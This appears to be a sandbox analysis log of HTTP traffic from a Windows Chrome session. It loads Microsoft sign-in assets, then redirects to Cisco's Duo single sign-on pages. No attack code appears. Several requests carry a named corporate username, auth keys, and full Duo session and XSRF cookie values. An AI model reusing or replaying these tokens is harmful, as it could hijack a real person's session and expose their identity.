Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dwUofH8SZLFcSGV&MD=BxftRVnd HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pidpredirect_e74b7f721910c56d695c.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pidpredirect_e74b7f721910c56d695c.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ws/sp/DIXH9AVY8FAAKO04PYZ8/passive?client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAjZO9j9t0GMfj5C53FxUalReV7QaEEMLOz-_OSZXq2HlxEidx7MSNl8hx_G7nl9i-y8V_ARMqC0MnQEynDggWQGoFG7oBdWLoVDF2QOimY-NaFhYklkfPo-_32T6fygGL0RiOgY9KBAZO3qdYhqYoeoGShMWgVH0BUI60GRRf1smbiGAZy0zuVKovxuGT-6olP8Ue21_fqn5-gXzgZdk6PanVttstFvtWAlPoZCRDYxaMa5G5Wvor94z4HkGeIcij4r69QifqRTFlSI5haUAzdJ0kWMARdUwWG7EsjmNDb2aG5sWyD4Dclum-Lu1kMczkfEIN9K5nBIPYEN3dUAspOZjtDE3JjHY3NgQAjEA572shPdOVTBYn50bcJGWtmQ_EafC8eHvIn2Ye8WrAxM_tq-KRA5N4voZp9qj0W9EPBaFLE8ySlcDIDOXEkno42k9Al4jJDU8S7kZk6ts82FB5YpI4PxpDPmKn7gpVjDhtj6IWbj7oLOZero3kkOUADyUv84zhTNfTXmxGQ3Ey8eBgKhEwwokm3U9ndsPoWkvFWDjGA2odTX2VYqEkdDsUDeqAc1xbF3pN1VjYEhudAds37EUnjAdysODJTkpo6Kk_jADfak8TWQxyx90IOWGqM73jzc36aJ3L0kaZrCmlEaSKbcJFA-KKFOkgEr2Zx-SzdtziZ9ulT_dytbehRvY4d5iMZgh6AqglwSadZI62CIv30H7Di1Q3GovxvLPjLZ8cB4ngG-jO2QKn0WxY3VU-bdGNDS3j8ySMIoXnL0rv_RsS6Di-Zb_G44z4tlS-WWK4uiyxcG2v_OXxOoGOH9nH__lTG76-OjC2MT6Kfi-9s7YzO8HS2M-8-5afWvBV89ke8nLv3cOD6v5d5Ljw4dugdHJ4WKkW7haOC9d7yFf7Nzxz1zXy6rtfh19--sWTdvkH5HK_RqnnuSPQIt4SuE08dXV91GrYsaCFQzJlBZ6f9mu4qYLxlrpHnuAPy8jDcvmyfCSJ80FT4-bgzzLyyUHhx6P_acbzW29VKqf-PIKWGdnpnX8M-emNwvWbn_319PEvVz__0Xl5-2P71A-7W47kzmsjfjvK5HHAZEGTcQ1v7VqOOGyrRJ6QmpXCe99UCy-qhb8B0&cbcxt=&username=peter.smith%40cisco.com&mkt=en-US&lc= HTTP/1.1Host: sso-dbbfec7f.sso.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5 HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/css/page/email-first.css?v=8132c HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
Source: global trafficHTTP traffic detected: GET /static/shared/lib/jquery/jquery.min.js?v=ff152 HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
Source: global trafficHTTP traffic detected: GET /static/js/page/email-first.js?v=488d0 HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
Source: global trafficHTTP traffic detected: GET /static/shared/lib/jquery/jquery.min.js?v=ff152 HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
Source: global trafficHTTP traffic detected: GET /static/js/page/email-first.js?v=488d0 HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
Source: global trafficHTTP traffic detected: GET /customization/account/pjr5mk7gIVVM96clMnJeaB_2v7s7l9mi0IW7F6yfzFw/logo_image.png?versionId=DzI1NMCJNJv6J3By1BhKLYgM8B5W6KuR HTTP/1.1Host: ux-asset-commercial.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cisco.login.duosecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/images/favicon_duo.ico?v=e3716 HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
Source: global trafficHTTP traffic detected: GET /customization/account/pjr5mk7gIVVM96clMnJeaB_2v7s7l9mi0IW7F6yfzFw/logo_image.png?versionId=DzI1NMCJNJv6J3By1BhKLYgM8B5W6KuR HTTP/1.1Host: ux-asset-commercial.duosecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/images/favicon_duo.ico?v=e3716 HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
Source: global trafficHTTP traffic detected: GET /email_first HTTP/1.1Host: cisco.login.duosecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
